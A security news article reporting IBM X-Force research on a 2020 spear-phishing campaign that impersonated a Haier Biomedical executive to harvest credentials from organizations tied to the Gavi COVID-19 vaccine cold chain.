Researchers are warning of a global phishing campaign aimed at organizations associated with a COVID-19 cold chain, which are companies responsible for keeping vaccines cold enough for safe storage and transportation.

Active since September 2020, this phishing operation spanned across six countries and targeted organizations likely associated with Gavi, The Vaccine Alliance’s Cold Chain Equipment Optimization Platform (CCEOP) program, a new report from IBM Security X-Force says. While the research team did not link the campaign to any particular threat actor or government, they say that the operation is likely the work of state-backed hackers.

“We assess that the purpose of this campaign may have been to harvest credentials to gain future unauthorized access. From there, the adversary could gain insight into internal communications, as well as the process, methods and plans to distribute a COVID-19 vaccine. This includes information regarding infrastructure that governments intend to use to distribute a vaccine to the vendors that will be supplying it,” the researchers said.

The malicious campaign involves spear phishing email ostensibly from an executive at Haier Biomedical, a Chinese company that is currently a supplier for the Gavi CCEOP program. The phishing emails posed as requests for quotations (RFQ) related to the CCEOP program and contained malicious HTML attachments that open locally, prompting recipients to enter their credentials to view the file.

“This phishing technique helps attackers avoid setting up phishing pages online that can be discovered and taken down by security research teams and law enforcement,” the report notes.

IBM says that the list of targets includes the European Commission’s Directorate-General for Taxation and Customs Union, as well as organizations within the energy, manufacturing, website creation and software and internet security solutions sectors.

The spear phishing campaign targeted select executives in sales, procurement, information technology and finance positions, likely involved in company efforts to support a vaccine cold chain. At this point, it is unclear if the phishing campaign was successful.

The IBM Security X-Force’s report also provides recommendations to defenders and a list of IoCs related to this phishing campaign.